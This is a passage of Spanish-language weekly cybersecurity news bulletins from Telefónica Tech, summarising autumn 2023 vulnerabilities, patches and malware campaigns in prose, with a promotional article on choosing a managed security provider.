Google parchea 15 vulnerabilidades en Chrome Google lanzó Chrome 119 parcheando un total de 15 vulnerabilidades, de las cuales tres de estos fallos de seguridad se consideran de gravedad alta. En concreto, estos se describen como implementación inapropiada en Pagos (CVE-2023-5480), validación de datos insuficiente en USB (CVE-2023-5482) y desbordamiento de enteros en USB (CVE-2023-5849). Además, de las diez vulnerabilidades restantes informadas por investigadores externos, ocho tienen una calificación de gravedad media y dos de gravedad baja. Las de gravedad media afectan componentes como impresión, perfiles, modo de lectura y panel lateral de Chrome, así como problemas de seguridad incorrecta en la interfaz de usuario y fallas de implementación inapropiada en descargas. Mientras que las de gravedad baja incluyen problemas en WebApp Provider y en la interfaz de usuario de Picture In Picture. Hasta el momento, no se menciona que estas vulnerabilidades se estén explotando en la naturaleza. Y como es habitual, Google mantiene restringido el acceso a los errores hasta que la mayoría de los usuarios actualicen. La versión 119 de Chrome está disponible para Linux, macOS y Windows, con actualizaciones para Chrome en Android y iOS. Mas información Espionaje a través de Mods de WhatsApp Ciberdelincuentes desconocidos están atacando a usuarios de habla árabe con malware de tipo spyware distribuido a través de mods de WhatsApp creados por los usuarios que personalizan o agregan nuevas funcionalidades a la aplicación. Estos mods, en un principio inofensivos, fueron inyectados con código malicioso y han estado activos desde mediados de agosto de 2023. Su principal vía de distribución ha sido a través de varios canales de Telegram que cuentan con miles de seguidores. Durante el mes de octubre, Kaspersky ha frustrado más de 340.000 ataques de este nuevo software espía en más de cien países, siendo los más afectados Azerbaiyán, Arabia Saudí, Yemen, Turquía y Egipto. También se han localizado estos mods en páginas webs no oficiales. Se recomienda utilizar únicamente descargas oficiales para evitar ser víctima de estos ataques. Más información Un fallo en dispositivos Apple expone las direcciones MAC de los usuarios Una investigación de Ars Techica ha demostrado que la función de privacidad de Apple que ocultaba la dirección MAC (Media Access Control) de los usuarios al conectarse a Wifi no funcionaba correctamente. De acuerdo con el informe publicado, esta función se creó con el objetivo de aleatorizar las direcciones MAC, que son enviadas al conectarse a la red, para evitar el rastreo de las conexiones Wifi de los usuarios. Sin embargo, al presentar un funcionamiento incorrecto, los dispositivos Apple continuaron mostrando la dirección MAC real en vez de la privada aleatorizada, que a su vez era trasmitida a todos los dispositivos conectados en la red. La vulnerabilidad que no permitía que esta característica funcionase correctamente, CVE-2023-42846, ya ha sido parcheada por Apple en iOS 17.1. Apple no ha dado detalles acerca de cómo este error de seguridad ha pasado desapercibido durante tres años, indicando únicamente que el código vulnerable ha sido eliminado. Más información Identificados 34 controladores de Windows vulnerables El equipo de investigadores de VMware ha publicado una investigación en la que señalan que 34 controladores de Windows de WDM y WDF son vulnerables. En concreto, los expertos señalan que actores amenaza podrían explotarlos sin la necesidad de poseer privilegios con la posibilidad de adquirir el control total de los dispositivos y ejecutar código arbitrario. Alguno de los controladores que disponen de registro de vulnerabilidad son PDFWKRNL.sys, CVE-2023-20598 y CVSSv3 de 7.8, o TdkLib64.sys, CVE-2023-35841. Cabe indicar que un total de 6 controladores permitirían el acceso a la memoria del kernel, pudiendo aprovechar para escalar privilegios y anular las soluciones de seguridad. Por otra parte, 12 controladores podrían explotarse para subvertir mecanismos de seguridad y otros 7 se pueden utilizar para borrar el firmware en la memoria flash SPI, lo que hace que el sistema no pueda arrancar. En último lugar, se señala que algunos de ellos ya disponen de parche para evitar este tipo de problema. Más información Nueva campaña de Lazarus contra un proveedor de software Se ha vinculado al Grupo Lazarus con una nueva campaña de ciberataque dirigida a un proveedor de software anónimo. Según una nota publicada por la firma de seguridad Kaspersky, el Grupo Lazarus ha aprovechado una vulnerabilidad en un proveedor de software de alto perfil para comprometer a sus víctimas. La cadena de ataque involucró la implementación de malware como SIGNBT y LPEClient, aunque el método exacto de distribución no se ha revelado. Al parecer, el proveedor de software ya había sido atacado previamente por Lazarus, lo que sugiere un intento de robar código fuente o alterar la cadena de suministro. El informe no menciona víctimas ni las vulnerabilidades explotadas; solo se conoce que estas no eran nuevas y el proveedor no las había solucionado a pesar de las advertencias. También se indica que varios objetivos fueron atacados a través de software legítimo de cifrado de comunicaciones web. Por último, Kaspersky enfatiza que estos ataques destacan la peligrosidad de explotar vulnerabilidades en software de alto perfil para propagar malware después de las infecciones iniciales; y que Lazarus ha demostrado un continuo esfuerzo por mejorar la sofisticación y efectividad de su malware. Más información 💬 Para recibir noticias y reflexiones de nuestros expertos en Ciberseguridad, suscríbete a CyberSecurityPulse, nuestro canal en Telegram: https://t.me/cybersecuritypulse Cyber Security Divulgación responsable de vulnerabilidades: a veces antes no es mejor 25 de octubre de 2023 Imagen de Freepik.
3 de noviembre de 2023
Boletín de Ciberseguridad, 21 - 27 de octubre
Vulnerabilidad Critica en Citrix NetScaler ADC y Gateway Recientemente, Citrix emitió una nota sobre la vulnerabilidad crítica CVE-2023-4966 CVSS 9.4 que afecta a dispositivos NetScaler ADC y Gateway. A pesar de que Citrix había corregido la vulnerabilidad el 10 de octubre, la firma de seguridad Mandiant descubrió que actores de amenazas la estaban explotando desde agosto de 2023. Esta vulnerabilidad permite a los atacantes robar sesiones de autenticación y secuestrar cuentas. Incluso después de aplicar el parche, las sesiones comprometidas persisten, lo que facilita el movimiento lateral en la red. Citrix recomienda la instalación inmediata de los parches y la finalización de todas las sesiones activas y persistentes mediante comandos específicos. CISA ha incluido esta vulnerabilidad en su catálogo y ha ordenado a las agencias federales proteger sus sistemas antes del 8 de noviembre. Además, un equipo de investigadores de Assetnote ha publicado un exploit funcional para la misma vulnerabilidad, que se puede ejecutar a través de un script en Python publicado en Github. Este exploit permite verificar la existencia de la vulnerabilidad y obtener información sensible explotando un desbordamiento de búfer en el encabezado HTTP Host. More info ExelaStealer: nuevo malware de robo de Información El investigador de Fortinet FortiGuard Labs, James Slaughter, recientemente observó y analizó un nuevo malware de robo de información identificado. El infostealer, denominado ExelaStealer, está escrito en Python y con soporte para JavaScript, tiene la capacidad de capturar contraseñas, tokens de Discord, tarjetas de crédito, cookies, pulsaciones de teclas, capturas de pantalla y datos del portapapeles en sistemas Windows comprometidos. Asimismo, se vende en foros underground y a través de un canal de Telegram, con opciones de pago que van desde 20 dólares al mes hasta 120 dólares por una licencia de por vida. Su bajo costo lo convierte en una herramienta atractiva para actores amenaza principiantes, ya que reduce significativamente la barrera de entrada para llevar a cabo ataques maliciosos. Por otro lado, cabe indicar que el malware se distribuye a través de un ejecutable que simula ser un documento PDF. Lo hallazgos acerca de ExelaStealer demuestran que siempre hay cabida para nuevos actores y campañas que apuntan a la extracción de datos pertenecientes a corporaciones e individuos que pueden usarse para chantaje, espionaje o rescate. More info Vulnerabilidades de alta gravedad en navegadores Chrome y Firefox Esta semana los fabricantes Mozilla y Google han lanzado parches de seguridad para corregir vulnerabilidades en los navegadores Firefox y Chrome. En lo referente al primero de los navegadores señalados, Mozilla lanzó un parche que corrige 11 vulnerabilidades, de las cuales 3 son consideradas de alta gravedad, en concreto, son las registradas como CVE-2023-5721, CVE-2023-5730, CVE-2023-5731 que podrían desencadenar en la ejecución de código arbitrario. Paralelamente, Google corrigió dos vulnerabilidades, incluido un problema de alta gravedad que ha sido registrado como CVE-2023-5472, cuya explotación podría permitir escapar del entorno del navegador para realizar una ejecución de código en el sistema operativo subyacente, siempre que se puedan combinar con otras fallas de seguridad. En último lugar, cabe indicar que ambos fabricantes recomiendan actualizar sus navegadores para corregir los fallos indicados. More info Análisis del actor amenaza Octo Tempest El equipo de investigadores de Microsoft ha publicado un análisis sobre el actor amenaza denominado Octo Tempest, también conocido como 0ktapus, Scattered Spider y UNC3944. Según los expertos, este actor amenaza habría comenzado su actividad a principios del año 2022 mediante la realización de ataques a organizaciones de subcontratación de procesos comerciales y telecomunicaciones móviles con la realización de acciones relacionadas con SIM swapping. Posteriormente, sus operaciones se enmarcaron en campañas de phishing empleando ingeniería social y el robo de datos apuntando a empresas de sectores del juego, hostelería, comercio, tecnología y finanzas. Asimismo, desde Microsoft señalan que Octa Tempest se habría afiliado a los operadores del ransomware ALPHV/BlackCat. En último lugar, cabe indicar que los expertos señalan que dichos actores maliciosos serían de habla inglesa, así como facilitan herramientas utilizadas por Octo Tempest junto a una serie de recomendaciones que ayudarían a identificar a dicho actor mediante soluciones de seguridad. More info Nueva campaña de distribución del malware DarkGate por Teams La compañía malwarebytes ha realizado una publicación en la que informan sobre la identificación de una campaña de malware que utilizaba mensajes externos de Teams con el objetivo de distribuir DarKGate Loader. Informado públicamente por primera vez en 2018, DarkGate es un malware basado en Windows con una amplia gama de capacidades que incluyen el robo de credenciales y el acceso remoto a los endpoints de las víctimas. En concreto, en la campaña actual de distribución, los expertos señalan que actores maliciosos tras estos hechos utilizaron como metodología de acción un intento de phishing a través de Microsoft Teams, enviando un archivo ZIP por este canal, con el objetivo de que la víctima cayese en el engaño y ejecutase el archivo para iniciar la infección del equipo. More info 💬 Para recibir noticias y reflexiones de nuestros expertos en Ciberseguridad, suscríbete a CyberSecurityPulse, nuestro canal en Telegram: https://t.me/cybersecuritypulse
27 de octubre de 2023
.jpg)
Boletín de Ciberseguridad, 14 - 20 de octubre
Vulnerabilidad explotada activamente en Citrix NetScaler El equipo de investigadores de Mandiant ha realizado una publicación en la que alerta sobre la explotación activa de una vulnerabilidad que afecta a Citrix NetScaler. En concreto, el fallo de seguridad se trata del registrado como CVE-2023-4966, CVSSv3 de 7.5, el cual fue parcheado la pasada semana por parte del fabricante. Sin embargo, nuevos detalles de la investigación realizada por el equipo de Mandiant apuntan a que esta vulnerabilidad habría sido explotada por actores maliciosos desde el pasado mes de agosto. Cabe indicar que el aprovechamiento de este fallo de seguridad se puede realizar sin requerir altos privilegios, interacción del usuario o alta complejidad, ya que el único requisito previo para explotar la vulnerabilidad es que el dispositivo esté configurado como puerta de enlace (servidor virtual VPN, proxy ICA, CVPN, proxy RDP) o servidor virtual AAA. Esto podría desencadenar en un acceso a información confidencial en los dispositivos afectados. Desde Citrix recomiendan aplicar los correspondientes parches de seguridad, así como seguir una serie de recomendaciones adicionales facilitadas por el fabricante. Más info. El grupo iraní Crambus compromete durante 8 meses los sistemas de un gobierno de Oriente Medio El grupo de ciberespionaje Crambus, también conocido como APT34, OilRig o Muddy Water, llevó a cabo una intrusión durante ocho meses en al menos 12 ordenadores de una red gubernamental de Oriente Medio. De acuerdo con Symantec Threat Hunter Team, el grupo de origen iraní es conocido por sus operaciones de obtención de inteligencia mediante intrusiones de larga duración, y habría llevado a cabo ataques contra múltiples gobiernos, incluyendo Arabia Saudí, Albania y EE.UU. En este último ataque, Crambus empleó diferentes tipos de malware combinados con herramientas legítimas para obtener, expandir y mantener su acceso en los sistemas de febrero a septiembre de 2023. Entre los malwares empleados destaca Backdoor.Power.Exchange, puerta trasera conocida que no había sido atribuida a este grupo hasta ahora, y que permite iniciar sesión en un servidor de Exchange para monitorizar emails enviados por los atacantes con comandos para la ejecución de código arbitrario en la PowerShell. Más info. Descubierto un nuevo malware que apunta al Sudeste Asiático Investigadores de Elastic Security Labs han identificado una nueva puerta trasera, apodada BLOODALCHEMY, utilizada en ataques dirigidos a gobiernos y organizaciones de la Asociación de Naciones de Asia Sudoriental (ASEAN). Este nuevo malware es parte del conjunto de intrusión REF5961, vinculado a China, y se ha observado recientemente en ataques de espionaje contra el gobierno de Mongolia. BLOODALCHEMY es una puerta trasera x86 escrita en C que se encuentra como código shell inyectado en un proceso benigno firmado; y requiere que se ejecute un cargador específico porque no tiene la capacidad de cargarse y ejecutarse por sí solo. Además, no se compila como independiente de la posición por lo que cuando se carga en una dirección base diferente a la preferida, el binario debe parchearse para tener en cuenta la nueva posición. Asimismo, el malware se comunica mediante el protocolo HTTP para conectarse a C2, y aplica un método clásico de ofuscación. Por otro lado, el análisis realizado destaca que el backdoor sólo contiene unos pocos comandos con efectos reales y funcionalidad limitada. Por lo que se deduce que el malware es parte de un conjunto de herramientas más grande y aún se encuentra en desarrollo activo debido a su falta de capacidades. Más info. Miles de dispositivos Cisco IOS XE vulnerados por 0-day Esta semana la compañía Cisco emitió un aviso de seguridad alertando sobre la vulnerabilidad 0-day crítica, CVE-2023-20198, activamente explotada que afecta a su software IOS XE y se utiliza en switches empresariales, routers, controladores wireless, entre otros. A raíz de estos hechos, investigadores de la empresa VulnCheck han publicado que actores maliciosos habrían infectado miles de dispositivos vulnerables, los cuales requieren que la función de interfaz de usuario web este habilitada, así como la función de servidor HTTP o HTTPS Asimismo, la compañía ha puesto a disposición en su repositorio de GitHub una herramienta para identificar si los sistemas de quienes usen el software Cisco IOS XE se han visto vulnerados por dicho fallo de seguridad. En último lugar, cabe indicar que pese a que aún no hay un parche disponible, se puede tomar como medida paliativa deshabilitar la interfaz web y eliminar todas las interfaces de administración de internet. Más info. BlackCat ransomware utiliza maquina virtual Muchkin en sus operaciones La Unidad 42 de Palo Alto ha publicado los resultados de una investigación en la que señalan que han identificado en incidentes de ransomware BlackCat la utilización de una nueva máquina virtual, denominada Munchkin, en sus operaciones. En concreto, esta se trata de una distribución personalizada de Alpine OS Linux que, tras comprometer un dispositivo, los operadores del ransomware instalan VirtualBox y crean una nueva máquina virtual utilizando la ISO de Munchkin. Cabe destacar que Munchkin permite que BlackCat se ejecute en sistemas remotos y/o cifre recursos compartidos de Server Message Block (SMB) o Common Internet File System (CIFS) remotos. Asimismo, cabe indicar que Munchkin incluye un conjunto de scripts y utilidades que permiten a sus operadores implementar cargas útiles de malware eludiendo las correspondientes soluciones de seguridad del equipo de sus víctimas. En último lugar, cabe indicar que los expertos señalan que el uso de máquinas virtuales por parte de operadores de ransomware en sus operaciones es una tendencia creciente. Más info. 💬 Para recibir noticias y reflexiones de nuestros expertos en Ciberseguridad, suscríbete a CyberSecurityPulse, nuestro canal en Telegram: https://t.me/cybersecuritypulse Imagen de Kjpargeter en Freepik. Cyber Security AI of Things Ciberseguridad en la era de la IA: por qué los ataques de phishing son ahora más peligrosos 9 de octubre de 2023
20 de octubre de 2023
 (1).jpg)
Boletín de Ciberseguridad, 7 - 13 de octubre
Apple corrige 0-day de iOS en iPhones y iPads antiguos Apple ha publicado actualizaciones de seguridad para iPhones y iPads antiguos con el fin de respaldar los parches lanzados hace una semana, abordando dos vulnerabilidades 0-day explotadas en ataques. El primer 0-day ha sido clasificado como CVE-2023-42824 y se trata de una vulnerabilidad de escalada de privilegios causada por un fallo en el kernel XNU que permite a los atacantes locales elevar privilegios en iPhones y iPads vulnerables. El segundo ha sido clasificado como CVE-2023-5217 y está causado por una vulnerabilidad buffer-overflow en la codificación VP8 de la biblioteca de códecs de vídeo open-source libvpx. Google parcheó previamente la vulnerabilidad libvpx como un 0-day en su navegador web Chrome. Microsoft también abordó la misma vulnerabilidad en sus productos Edge, Teams y Skype. Más info Microsoft parchea 104 vulnerabilidades, incluyendo tres 0-day Microsoft ha publicado las actualizaciones del Patch Tuesday del mes de octubre en las que se parchean un total de 104 vulnerabilidades. Entre los fallos parcheados se encuentran tres 0-day activamente explotadas: CVE-2023-41763, CVE-2023-36563 y CVE-2023-44487. Mientras que CVE-2023-41763 es una vulnerabilidad que afecta a Skype for Business y permite llevar a cabo una elevación de privilegios, CVE-2023-36563 permite el robo de hashes NTLM al abrir un documento en WordPad. Por otro lado, Microsoft ha publicado mitigaciones para CVE-2023-44487, fallo que permite llevar a cabo una nueva técnica de DDoS llamada HTTP/2 Rapid Reset, que abusa de la función de cancelación de transmisión de HTTP/2 para enviar y cancelar solicitudes continuamente, abrumando al servidor. Por último, hay que destacar que, de las 101 vulnerabilidades restantes parcheadas, 12 de ellas han sido clasificadas como críticas. Más info Vulnerabilidad crítica en cURL El autor de la herramienta cURL, Daniel Stenberg, ha publicado una advertencia en LinkedIn y GitHub sobre una vulnerabilidad grave y ha anunciado el lanzamiento de la versión 8.4.0 el miércoles, que la corrige. La vulnerabilidad se ha identificado como CVE-2023-38545 y afecta tanto a las librerías cURL como a libcurl. Además, en la nueva versión también se abordará el fallo CVE-2023-38546, de menor gravedad. cURL es una herramienta de línea de comandos utilizada para la transferencia de ficheros con formato URL. Cabe destacar que no se han revelado más detalles acerca de la vulnerabilidad debido a su criticidad, si bien no se ha detectado su explotación activa. Más info Nueva campaña de Magecart esconde malware en páginas de error 404 Investigadores de Akamai Security Intelligence Group han detectado una nueva campaña de skimming de webs del actor amenaza Magecart, dirigida a tiendas web de Magento y WooCommerce de los sectores retail y alimentación. La infraestructura del ataque de esta campaña puede dividirse en tres partes, con el objetivo de dificultar su detección: loader, código malicioso de ataque y exfiltración de datos al servidor de comando y control. En el caso de esta campaña se han observado tres variantes, dos de las cuales son muy similares entre sí, y una tercera que ha llamado la atención de los investigadores por su capacidad de esconder el código malicioso por medio de las páginas de error 404 de las webs afectadas. Aunque el loader ha sido eliminado de algunas de las webs afectadas, el skimmer podría reactivar el ataque con facilidad, por lo que los investigadores destacan la importancia de la detección y mitigación de estos ataques. Más info Balada Injector explota vulnerabilidades de tagDiv Investigadores de seguridad de Sucuri han publicado un artículo donde dan detalles de la explotación de las vulnerabilidades de tagDiv, complemento de los temas Newspaper y Newsmag para WordPress, por parte de Balada Injector. Un signo revelador de la explotación de esta vulnerabilidad XSS recientemente revelada en el tagDiv Composer es un script malicioso que se encuentra inyectado dentro de etiquetas. El objetivo de los actores de amenaza de Balada Injector siempre es mantener el control de los sitios comprometidos mediante backdoors, plugins maliciosos y la creación de administradores de blogs deshonestos. En este caso, la vulnerabilidad no les permite alcanzar fácilmente este objetivo. Sin embargo, esto no les ha impedido intentar apoderarse completamente de los sitios con vulnerabilidades stored XSS. Más info 💬 Para recibir noticias y reflexiones de nuestros expertos en Ciberseguridad, suscríbete a CyberSecurityPulse, nuestro canal en Telegram: https://t.me/cybersecuritypulse Imagen: Freepik.
13 de octubre de 2023
.jpg)
Boletín de Ciberseguridad, 30 de septiembre - 6 de octubre
Apple parchea dos nuevas vulnerabilidades 0-day Apple ha publicado una nueva actualización de seguridad para iPhone y iPad que parchea una vulnerabilidad 0-day activamente explotada en ataques. El fallo, denominado CVE-2023-42824, permite a los atacantes locales realizar una escalada de privilegios debido a un error en el XNU kernel. Esta vulnerabilidad parece haber sido explotada activamente en versiones de iOS anteriores a la 16.6. En la misma actualización de seguridad, Apple ha parcheado otra 0-day, CVE-2023-5217 CVSS 8.8, vulnerabilidad que causaba un desbordamiento de búfer de montón en la codificación VP8 de la biblioteca de código abierto de códecs de vídeo libvpx. E sta misma biblioteca ya habría sido parcheada por Google recientemente. Ambas vulnerabilidades han sido corregidas en las versiones iOS 17.0.3 e iPadOS 17.0.3. Con esta nueva actualización, Apple habría parcheado un total de 17 0-days explotadas activamente en ataques en 2023. Más info Microsoft corrige productos afectados por dos 0-days explotados activamente La compañía Microsoft ha lanzado actualizaciones de seguridad para sus productos Edge, Teams y Skype con el objetivo de parchear dos vulnerabilidades 0-day que afectan a bibliotecas de código abierto utilizadas por los tres productos señalados. En concreto, los fallos de seguridad son los registrados como CVE-2023-4863, CVSSv3 de 8.8, el cual se produce debido a una debilidad de desbordamiento de búfer en la biblioteca de códigos WebP (libwebp), y cuyo aprovechamiento podría derivar en la ejecución de código arbitrario. Asimismo, la vulnerabilidad CVE-2023-5217, CVSSv3 de 8.8, que también se produce por una debilidad de desbordamiento de búfer en la codificación VP8 de la biblioteca de códecs de video libvpx, y su aprovechamiento por parte de actores maliciosos podría provocar fallas en la aplicación o permitir la ejecución de código arbitrario. Cabe indicar que ambas vulnerabilidades fueron catalogadas como explotadas activamente, por este motivo la compañía recomienda aplicar las correspondientes actualizaciones para prevenir una posible afectación. Más info Descubierta campaña contra empresas de pagos en línea y proveedores PoS Recientemente fue detectada una campaña que se ha dirigido a empresas de pagos en línea en Asia Pacífico, América del Norte y América Latina durante más de un año. El equipo de investigación de BlackBerry ha rastreado esta actividad bajo el nombre Silent Skimmer y la atribuye a un actor amenaza de origen chino. Según la investigación, las víctimas de esta campaña incluyen empresas en línea y proveedores de puntos de venta (PoS). Los atacantes explotan vulnerabilidades en aplicaciones web, especialmente aquellas alojadas en Internet Information Services (IIS), para comprometer la página de pago y capturar información financiera de las víctimas. Asimismo, utilizan herramientas de código abierto y técnicas de escalada de privilegios, post-explotación y ejecución de código. Además, los servidores privados virtuales (VPS) utilizados para el C2 se eligen según la ubicación geográfica de las víctimas para evadir la detección. La cadena de ataque culmina en la implementación de un troyano de acceso remoto basado en PowerShell, permitiendo el control remoto del host, que se conecta a un servidor remoto con utilidades adicionales. Más info Lazarus apunta contra empresa aeroespacial española utilizando nuevo malware El equipo de investigadores de ESET ha publicado los resultados de una investigación en la que analizan la denominada operación Dreamjob, orquestada por el grupo malicioso norcoreano Lazarus, empleando un nuevo malware llamado LightlessCan. En esta ocasión estos actores maliciosos habrían dirigido sus acciones contra una empresa aeroespacial española a través de LinkedIn. La metodología empleada consistía en engañar a los trabajadores de dicha compañía para participar en un proceso de selección de empleo falso que requería que la víctima descargarse un archivo malicioso. En concreto, esa carga útil se trata del malware NickelLoader, el cual implementa dos puertas traseras, una variante de BlindingCan y una nueva denominada LightlessCan, la cual dispone de 43 comandos, aunque podría disponer de 25 más aún sin implementar. Asimismo, destaca por disponer fuertes medidas de protección para impedir el acceso externo al equipo de la víctima por parte de investigadores de seguridad. En último lugar, cabe indicar que dichas acciones se alejan de un lucro económico al presentar objetivos de ciber espionaje. Más info Detectada campaña de troyano bancario contra usuarios en Latinoamérica Investigadores de Kaspersky informaron acerca de una nueva campaña del troyano bancario Zanubis, que afecta a dispositivos Android, haciéndose pasar por una aplicación gubernamental peruana para engañar a los usuarios. Según se indica, este troyano fue observado por primera vez en agosto de 2022 y su principal método de infección es disfrazarse de aplicaciones legítimas para luego obtener permisos de accesibilidad y tomar el control del dispositivo infectado. Además, Zanubis ha estado dirigido principalmente a Latinoamérica y apunta a más de 40 bancos y entidades financieras. El malware, utiliza permisos de accesibilidad para mostrar pantallas falsas sobre aplicaciones específicas y robar credenciales, también recopila datos de contactos, aplicaciones y metadatos. Y una vez instalado, bloquea el dispositivo y registra pulsaciones de teclas o graba la pantalla. En esta nueva campaña, Zanubis fue observado suplantando al ente encargado de la administración tributaria y aduanas del Perú. Más info Imagen de Kjpargeter en Freepik.
6 de octubre de 2023
Elegir un proveedor de servicios gestionados de seguridad (MSSP): todo lo que necesitas saber
Un proveedor de servicios gestionados de seguridad (MSSP) ofrece a las organizaciones acceso a un equipo de expertos en Ciberseguridad altamente cualificado sin la necesidad de invertir en tecnología, formación e incorporación de un equipo interno. Hasta ahora este tipo de servicios lo contrataban sobre todo grandes empresas, y cada vez más también pequeñas y medianas empresas (pymes) por la creciente necesidad de proteger sus operaciones y la continuidad de sus negocios. Con el fin de ayudar a las empresas en su proceso de selección de un proveedor de servicios gestionados de seguridad, hemos recopilado 5 claves para contratar un MSSP y acertar: 1. Posición en rankings de MSSP reconocidos por la industria A la hora de elegir un MSSP es imprescindible valorar su posición en los rankings especializados. Dado que los proveedores de MSSP pueden ofrecer una variedad de servicios gestionados y enfoques de seguridad, es imprescindible conocer sus fortalezas y debilidades. Una forma de hacerlo es consultar rankings reconocidos en la industria. Un ejemplo es el ranking de referencia Top 250 Global MSSP que elabora anualmente MSSP Alert. Clasifica a los principales 250 proveedores de servicios gestionados de seguridad en base a diversos criterios, como el número y las certificaciones de sus profesionales, los servicios ofrecidos y el reconocimiento de analistas de la industria como Gartner, Forrester o IDC, entre otros. ✔️ Telefónica Tech, 2º en la lista Top 250 Global MSSP de MSSP Alert en 2023. Esta posición reconoce nuestra excelencia operativa en aspectos fundamentales de la oferta de servicios gestionados de Ciberseguridad. Utilizar estos rankings como referencia ayuda a seleccionar un socio de alto nivel que externalice la seguridad. 2. Un MSSP que simplifique el ecosistema de Ciberseguridad En un mundo con una creciente cantidad de actores en el ámbito de la Ciberseguridad, la simplificación es esencial. Las empresas buscan reducir el tiempo y los recursos necesarios para integrar tecnologías, seleccionar proveedores y calificar servicios. Por lo tanto, es fundamental que el MSSP elegido simplifique este complejo ecosistema. Acceder a las mejores tecnologías y partners a través de un MSSP permitirá a las empresas delegar tareas críticas como actualizaciones, parches y corrección de errores. Esto, a su vez, agiliza la toma de decisiones y permite que las empresas se enfoquen en sus operaciones principales, en lugar de lidiar con la gestión de la Ciberseguridad. ✔️ Nuestra oferta comercial completa cuenta con el respaldo de los partners tecnológicos líderes del mercado. Esto nos permite mantenernos a la vanguardia de la innovación, y ofrecer hoy las soluciones a los retos del mañana. Además de la simplificación, otro aspecto a considerar al elegir un MSSP es la capacidad de adaptación. En un contexto donde las amenazas y los desafíos pueden cambiar rápidamente, es esencial que el MSSP pueda adaptarse ágilmente a las nuevas circunstancias. Esto implica la capacidad de implementar nuevas soluciones y estrategias de seguridad a medida que se actualizan y están disponibles, para hacer frente a las amenazas emergentes. 3. Con experiencia en servicios gestionados de seguridad Seleccionar un MSSP con experiencia probada y comprobada en servicios gestionados de seguridad y que tenga un historial sólido en la protección de sus clientes, esencial para identificar y mitigar rápidamente las vulnerabilidades. Más allá de la capacidad técnica, la experiencia proporciona la ventaja de haber enfrentado una amplia gama de situaciones y amenazas a lo largo del tiempo. Esto significa que el MSSP no solo comprende las amenazas actuales, sino que también está preparado para anticipar amenazas futuras. Además, la experiencia permite afinar los procesos y estrategias de seguridad para lograr una respuesta eficiente y efectiva en caso de incidente, por lo que al elegir un MSSP con un historial sólido en servicios gestionados de seguridad se está invirtiendo en experiencia en la protección contra las amenazas cibernéticas. ✔️ Nuestra amplia experiencia abarca desde servicios de asesoría hasta la ingeniería de seguridad gestionada y las operaciones, lo que garantiza una comprensión integral de las amenazas y la capacidad de abordarlas de manera efectiva. 4. Servicio de ciberinteligencia y soluciones MSSP completas Una de las características distintivas de un MSSP de alto nivel es su capacidad para proporcionar inteligencia de ciberamenazas, tecnología avanzada y procedimientos rigurosos. Los MSSP supervisan y gestionan dispositivos y sistemas de seguridad, incluyendo servicios como cortafuegos, detección de intrusiones y escaneo de vulnerabilidades. Sin embargo, es importante destacar que no todos los MSSP ofrecen soluciones completas, por lo que es necesario evitar proveedores que puedan dejar lagunas en su seguridad. Estas lagunas pueden surgir cuando un MSSP no ofrece servicios específicos o no aborda adecuadamente ciertos aspectos de la Ciberseguridad de una organización. Por ejemplo, algunos MSSP pueden centrarse en la detección de amenazas, pero pueden no proporcionar una gestión sólida de vulnerabilidades o una respuesta eficiente a incidentes. Esto dejará a las empresas con importantes debilidades en su estrategia de seguridad. ✔️ NextDefense de Telefónica Tech integra Detección y Respuesta Gestionada (MDR), Gestión de Riesgos de Vulnerabilidad (VRM), Inteligencia de Ciberamenazas (CTI) y Protección de Riesgos Digitales (DRP) en una única solución. Esto proporciona a nuestros clientes una protección integral que abarca desde plataformas Cloud hasta empleados remotos, activos digitales y reputación de la marca. 5. Control sobre los costes del MSSP y tecnologías de seguridad Cuando se trata de controlar los costes en la gestión de la Ciberseguridad es importante destacar que un enfoque personalizado es clave. No todas las empresas tienen las mismas necesidades ni los mismos recursos. Por lo tanto, un MSSP de calidad debe ser capaz de adaptar sus soluciones y precios a las características y necesidades específicas de cada cliente. Esto implica no solo ofrecer precios competitivos, sino también proporcionar opciones flexibles que permitan a las empresas escalar sus servicios de seguridad según su crecimiento y riesgos potenciales. Al elegir un MSSP que ofrezca esta flexibilidad, las empresas mantienen el control total sobre sus costes de Ciberseguridad sin sacrificar la calidad ni la eficacia de la protección. Es decir, sin poner en riesgo la continuidad de sus operaciones y negocios. ✔️ En Telefónica Tech proporcionamos tecnología, expertos y procesos a un coste de inversión y acuerdos de nivel de servicio (SLA) fijos y predecibles. Esto elimina la necesidad de inversiones en capital (Capex) y ofrece una visión global y transparente de los gastos en Ciberseguridad. * * * Ciberseguridad Future Workplace La importancia del control de acceso: ¿está tu empresa protegida? 29 de mayo de 2023
5 de octubre de 2023
.jpg)
Boletín de Ciberseguridad, 23 - 29 de septiembre
Google parchea una 0-day de Chrome explotada activamente Google ha publicado una nueva actualización de seguridad para Chrome en la que se parchean un total de diez fallos de seguridad, incluyendo tres vulnerabilidades de severidad alta. Entre los fallos parcheados, se encuentra una 0-day que está siendo explotada en ataques desde principios de 2023, denominada CVE-2023-5217, y que está causada por una debilidad de desbordamiento del búfer en la codificación VP8 de la biblioteca libvpx. El impacto de esta vulnerabilidad incluye desde fallos de aplicaciones hasta la ejecución de código arbitrario por un atacante. Las otras dos vulnerabilidades son de tipo use-after-free y afectan a Passwords (CVE-2023-5186) y Extensions (CVE-2023-5187). Según Google, la actualización 117.0.5938.132 estará disponible para Windows, Mac y Linux en los próximos días. La empresa también ha afirmado que no revelará más detalles acerca de los fallos hasta que los parches no hayan sido implementados por la mayoría de los usuarios por motivos de seguridad. Más info Mozilla parchea vulnerabilidades de alta gravedad en Firefox y Thunderbird Mozilla emitió actualizaciones de seguridad para Firefox y Thunderbird, abordando nueve vulnerabilidades, algunas de alta gravedad. La actualización de Firefox 118 incluye parches para cinco vulnerabilidades de criticidad alta según fabricante, que son principalmente problemas de memoria con potencial explotable. Las dos primeras vulnerabilidades, CVE-2023-5168 y CVE-2023-5169, involucran problemas de escritura fuera de límites en componentes del navegador. El tercer fallo de seguridad, CVE-2023-5170, es una pérdida de memoria que podría permitir el escape del entorno de pruebas. Otra vulnerabilidad, CVE-2023-5171, se encontró en el compilador Ion y podría conducir a un bloqueo potencialmente explotable. También fue resuelta la CVE-2023-5172, que consiste en problemas de corrupción de memoria. Asimismo, para el caso de Thunderbird fueron parcheados múltiples errores de seguridad de memoria, CVE-2023-5176, con riesgo de ejecución de código. Aunque no se mencionan ataques maliciosos, Mozilla pone énfasis en que estas actualizaciones son críticas para proteger los sistemas. Más info Progress Software advierte de vulnerabilidades críticas en WS_FTP Progress Software, empresa desarrolladora de MoveIT Transfer, cuyas vulnerabilidades han sido explotadas masivamente por el grupo de ransomware Cl0p, ha advertido de la existencia de dos vulnerabilidades críticas en 